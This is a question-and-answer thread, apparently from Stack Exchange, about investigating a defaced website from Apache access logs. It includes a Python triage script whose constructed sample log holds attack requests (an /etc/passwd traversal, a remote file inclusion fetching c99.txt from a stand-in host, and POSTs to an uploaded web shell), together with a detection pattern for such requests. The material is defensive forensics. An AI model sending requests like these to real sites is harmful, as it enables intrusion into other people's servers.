10

My company's website has been defaced. Given that I have the raw Apache access log, is there anything I could do to analyze when and what went wrong?

I mean, what should I look out for among all those thousands and thousands of lines of log?

Thanks for the help

nik
SteD

3 Answers

4

Daisetsu's answer is on the right lines.
But you might be able to get some analysis done without hiring a full-time expert too.
I am adding a couple of links to short articles that will give you the gist of what can be done.

  1. Web Security Interview Questions at WebAppSec
  2. Using your web server logs to find compromised web servers at DigitalOffencive
  3. What to do after a Web Site Defacement?

Suggestion: Moving this question to ServerFault might get more directed answers on what can be done.

nik
  • Thanks for the links and suggestions. How can I move this to ServerFault? It seems like ServerFault is the most appropriate place to ask this. – SteD May 27 '10 at 03:47
  • @SteD, you could have posted it there. But now, do not make a second posting `:-)` It is already being moved there; it needs a total of 5 votes for that. I have added mine -- others will help. – nik May 27 '10 at 05:12
4

When a system is compromised/defaced you're never sure if everything was cleaned, and IMHO the best solution is always to reinstall it, but you need to do some forensics to understand what happened and prevent it from happening again.

Here's a list of important things to check:

  • take a look at every logfile you can, especially the webserver and the system ones. In the webserver logfiles, check for POST requests
  • run rootkit checkers. They're not infallible but can lead you in the right direction. chkrootkit and especially rkhunter are the tools for the job
  • run nmap from outside of your server and check if there is something listening on any port that shouldn't be
  • if you have an rrdtool trending application (like Cacti, Munin or Ganglia), take a look at the graphs and search for a possible time frame of the attack.
  • check the version of your webserver and see if there are known security issues with it.

Also, always keep this in mind:

  • shut down the services you don't need
  • test backups on a regular basis
  • follow the least privilege principle
  • have your services updated, especially regarding security updates
  • don't use default credentials

Hope this helps.

Marco Ramos
  • +1, when compromised, save a copy of the "new" content, and restore everything from a backup. (Just one more reason to **keep good backups**). – Chris S May 27 '10 at 13:50
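The first two bullets of the answer above (read the webserver log, look at the POSTs, find the time frame) are mechanical enough to script. The following is an added example, not code from the thread or from any of the people answering. The log lines in `SAMPLE_LOG` are constructed for illustration (documentation IP ranges, made-up paths), and the `SUSPICIOUS_PATH` patterns are an assumed starting list, not an exhaustive signature set. It parses Apache's default `combined` log format, pulls out every POST and every request whose path looks like directory traversal, remote file inclusion, SQL injection or a known web-shell name, and reports the source IPs and the first/last suspicious timestamp so you know which slice of the thousands of lines to read by hand.

```python
"""Triage an Apache combined-format access log after a defacement.

Added example, not code from the thread above. The lines in SAMPLE_LOG are
constructed for illustration; the heuristics are the ones the answers
suggest: read the POST requests, flag odd request paths, and narrow the
attack down to a time window.
"""
import re
from collections import Counter
from datetime import datetime

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Request paths a brochure site should never see: directory traversal,
# remote-file-inclusion URLs passed as parameters, SQL injection keywords,
# and the names of well-known PHP web shells. Assumed starting list only.
SUSPICIOUS_PATH = re.compile(
    r'(\.\./|/etc/passwd|/proc/self|\bunion\b.*\bselect\b|<script'
    r'|\.php\?[^ ]*=(https?|ftp)://|\b(c99|r57|shell)\b)',
    re.IGNORECASE,
)

# Constructed sample: two ordinary visitors and one attacker who probes for
# local file inclusion, pulls in a remote shell, then POSTs commands to it.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2010:22:01:13 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [26/May/2010:22:01:14 +0000] "GET /images/logo.png HTTP/1.1" 200 8040 "http://example.com/" "Mozilla/5.0"
198.51.100.7 - - [26/May/2010:23:40:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1245 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [26/May/2010:23:40:09 +0000] "GET /index.php?page=http://evil.example/c99.txt HTTP/1.1" 200 38122 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [26/May/2010:23:41:30 +0000] "POST /uploads/shell.php HTTP/1.1" 200 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [26/May/2010:23:42:05 +0000] "POST /uploads/shell.php HTTP/1.1" 200 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.9 - - [27/May/2010:00:15:44 +0000] "GET / HTTP/1.1" 200 3071 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Yield one record per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        rec = m.groupdict()
        rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
        rec["status"] = int(rec["status"])
        yield rec


def is_suspicious(rec):
    """POSTs (state-changing requests) and known-bad paths go to the top of the pile."""
    return rec["method"] == "POST" or SUSPICIOUS_PATH.search(rec["path"]) is not None


def triage(text):
    """Return suspicious records, per-IP counts, and the first/last suspicious timestamps."""
    hits = [r for r in parse_log(text) if is_suspicious(r)]
    by_ip = Counter(r["ip"] for r in hits)
    window = None
    if hits:
        times = [r["time"] for r in hits]
        window = (min(times), max(times))
    return {"hits": hits, "by_ip": by_ip, "window": window}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print("suspicious requests:")
    for r in result["hits"]:
        print(f"  {r['time']:%Y-%m-%d %H:%M:%S} {r['ip']:15} {r['method']:4} "
              f"{r['status']} {r['size']:>6} {r['path']}")
    print("by source IP:", dict(result["by_ip"]))
    if result["window"]:
        start, end = result["window"]
        print(f"attack window: {start:%Y-%m-%d %H:%M:%S} .. {end:%Y-%m-%d %H:%M:%S}")
```

Once the script gives you a source IP and a two-minute window, go back to the raw log and read everything from that IP, not just the flagged lines; the status and response size columns tell you whether a probe worked (in the constructed sample, the `/etc/passwd` request returned 200 with a non-trivial body, which is what a successful file inclusion looks like). Two caveats a practitioner would add: an attacker who got code execution may have edited or truncated the access log, so compare it against system logs, the trending graphs the answer mentions and any off-box copy; and a real site will need the pattern list tuned to its own application, since a CMS admin interface legitimately receives POSTs all day.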
1

Yes, this is known as Network Forensics. It essentially is looking through network and server logs in order to find the origin of the attack and what was compromised. To do this though you usually need a forensic specialist, and even when you do find out what happened, the worst you could do is sue the attacker or get them charged with a criminal act. A web defacement really isn't seen as a huge crime, that is unless there was money lost by the company as a result of the attack. If it's serious you should contact the appropriate authority and they will help with the collection of evidence. Here's a list of who to contact for cyber crime: http://www.justice.gov/criminal/cybercrime/reporting.htm Also, this doesn't count as legal advice.

Daisetsu
  • Why would you need a forensic specialist to analyze Apache logs? A working knowledge of Linux and Apache should be qualification enough. – MDMarra May 27 '10 at 03:26
  • I was speaking from a legal point of view. If you want some informal review then put the logs in front of the IT guy. –  May 27 '10 at 05:29
  • @Daisetu - The OP didn't say anything about legal repercussions for the attacker. He specifically asked what to look for to find out what went wrong. – MDMarra May 27 '10 at 18:44